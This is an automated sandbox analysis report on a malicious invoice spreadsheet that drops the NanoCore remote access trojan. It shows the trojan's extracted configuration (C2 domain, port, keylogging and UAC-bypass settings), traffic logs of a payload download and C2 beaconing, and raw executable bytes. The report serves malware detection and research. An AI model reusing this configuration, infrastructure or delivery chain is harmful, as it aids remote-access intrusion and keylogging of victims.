Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp |
Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "9ed8d108-2eb1-4e23-9679-783796e4", "Group": "Default", "Domain1": "godisgood1.hopto.org", "Domain2": "", "Port": 7712, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions 
Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"} |
Source: INVOICE = 212888585 .xlsx |
Virustotal: Detection: 42% |
Source: INVOICE = 212888585 .xlsx |
ReversingLabs: Detection: 50% |
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe |
ReversingLabs: Detection: 30% |
Source: C:\Users\user\AppData\Roaming\ALP.exe |
ReversingLabs: Detection: 30% |
Source: Yara match |
File source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000004.00000002.691609233.0000000002431000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTR |
Source: INVOICE = 212888585 .xlsx |
Joe Sandbox ML: detected |
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe |
Joe Sandbox ML: detected |
Source: C:\Users\user\AppData\Roaming\ALP.exe |
Joe Sandbox ML: detected |
Source: 4.2.ALP.exe.400000.0.unpack |
Avira: Label: TR/Dropper.Gen |
Source: 17.2.smtpsvc.exe.400000.0.unpack |
Avira: Label: TR/Dropper.Gen |
Source: 4.2.ALP.exe.6c0000.3.unpack |
Avira: Label: TR/NanoCore.fadte |
Source: 16.2.smtpsvc.exe.400000.0.unpack |
Avira: Label: TR/Dropper.Gen |
Source: 14.2.ALP.exe.400000.0.unpack |
Avira: Label: TR/Dropper.Gen |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process created: C:\Users\user\AppData\Roaming\ALP.exe |
|
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process created: C:\Users\user\AppData\Roaming\ALP.exe |
Source: unknown |
Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: |
Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: ALP.exe, 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp |
Source: |
Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp |
Source: |
Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp |
Source: |
Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: ALP.exe, 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp |
Source: |
Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ALP.exe, 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp |
Source: |
Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp |
Source: global traffic |
DNS query: name: godisgood1.hopto.org |
Source: C:\Users\user\AppData\Roaming\ALP.exe |
Code function: 4x nop then lea esp, dword ptr [ebp-08h] |
4_2_0072C8F6 |
Source: C:\Users\user\AppData\Roaming\ALP.exe |
Code function: 4x nop then lea esp, dword ptr [ebp-08h] |
4_2_0072C890 |
Source: C:\Users\user\AppData\Roaming\ALP.exe |
Code function: 4x nop then lea esp, dword ptr [ebp-08h] |
4_2_0072C880 |
Source: C:\Users\user\AppData\Roaming\ALP.exe |
Code function: 4x nop then lea esp, dword ptr [ebp-04h] |
4_2_00729EC8 |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 136.144.41.96:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 136.144.41.96:80 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49166 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49167 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 103.147.184.84:7712 |
Source: Traffic |
Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 103.147.184.84:7712 |
Source: Malware configuration extractor |
URLs: godisgood1.hopto.org |
Source: Malware configuration extractor |
URLs: |
Source: Joe Sandbox View |
ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN |
Source: Joe Sandbox View |
ASN Name: WORLDSTREAMNL WORLDSTREAMNL |
Source: global traffic |
HTTP traffic detected: GET /HHK.exe HTTP/1.1Connection: Keep-AliveHost: 136.144.41.96 |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:57:37 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9Last-Modified: Wed, 15 Sep 2021 03:07:30 GMTETag: "93400-5cbffffb6965c"Accept-Ranges: bytesContent-Length: 603136Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 98 60 4b 8c 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2a 09 00 00 08 00 00 00 00 00 00 ba 48 09 00 00 20 00 00 00 60 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 48 09 00 4f 00 00 00 00 60 09 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 09 00 0c 00 00 00 4c 48 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 28 09 00 00 20 00 00 00 2a 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 09 00 00 02 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 48 09 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 c4 5e 01 00 03 00 00 00 6f 00 00 06 54 9e 01 00 f8 a9 07 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 0 |